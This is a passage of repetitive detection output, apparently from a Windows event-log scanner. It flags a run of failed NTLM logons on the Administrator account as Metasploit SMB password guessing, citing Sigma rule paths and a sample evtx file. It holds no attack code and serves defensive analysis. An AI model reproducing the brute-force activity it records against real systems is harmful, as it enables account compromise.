SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k7tR8gp2piqqixqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.197 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SqSBRMoiFeWe4FAt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.245 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nu4m1xKDU0OUkoR0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.297 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.354 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: gui98cdQHPgyNOZI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.354 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.407 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bm4U7TAfsPTEiygC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.407 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fDOoaVWVFAMLiA71 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.457 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qiJeLgInEkHffefo : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.497 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yWyguWQP2iYUArhD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.547 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.595 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vDa3GqsTMMXguFhi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.595 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Lr0lkAcdnji1zjW4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.645 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4WfNFd5MkQxaxHGP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.693 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j8hdPhtxP4Ds65yV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.741 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y2BBoWoXWXuRysTx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 6GEhZ2BduHwjJj9H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GbwEHQCAUJd64LlA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.927 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.967 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wGfoObbN8ioefyce : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.967 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iLHhCgHvmOzoLLqG : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.009 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.050 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v9KL69y47DMyFOWT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.050 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.098 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ECuVYiqdMw2dMjT6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.098 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YJCYumRekD7AREYQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.150 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0H4OxKzoemZrsosT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wSHnvxa0khWdWBVx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.238 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bJkPp0bghDCPYz52 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: SfHRWGXjCej9HSPb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.333 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.383 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X42H7EvrvzsRqXWO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.383 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: moo42NdOq30Gnz3T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A4NHVYxxDkCOsQw8 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.475 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iPUiW0vFQB405kwS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OtcZ4ymkeLHeU7YJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.573 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZxZCDKWtqkGJ0dnw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.620 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f4GGnhttZgmRPRJo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.666 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.716 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gI0j9w45eXEFeex3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.716 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BVZ2YRDUAOsNgKxo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.764 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: VJfIpxlcwVf7pWga : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.822 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Oerixd9ODF6fslsC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.858 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sbJC5yvrIymYgaHY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.951 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4schZcUP8Im8Ee1e : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.951 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WotargyGlEq9PBch : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.988 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.025 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2JSMrPoucOR0nzlD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.025 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jr4w4uoF2DVZ5n9x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.064 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v319oZIaOBpuf542 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.104 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.151 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GNRTL9BLlGWMx6dA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.151 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zHlDIOZ9B5uY8Rzz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.192 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: Dr2bvAue8mr5kagX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pXBds9GoXr6IZUfp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.284 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aLYuegjXO18lo342 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.327 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.367 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: To3MMEEvNXKNjKHT : IP Address: 192.168.198.149 : AuthPackage: 
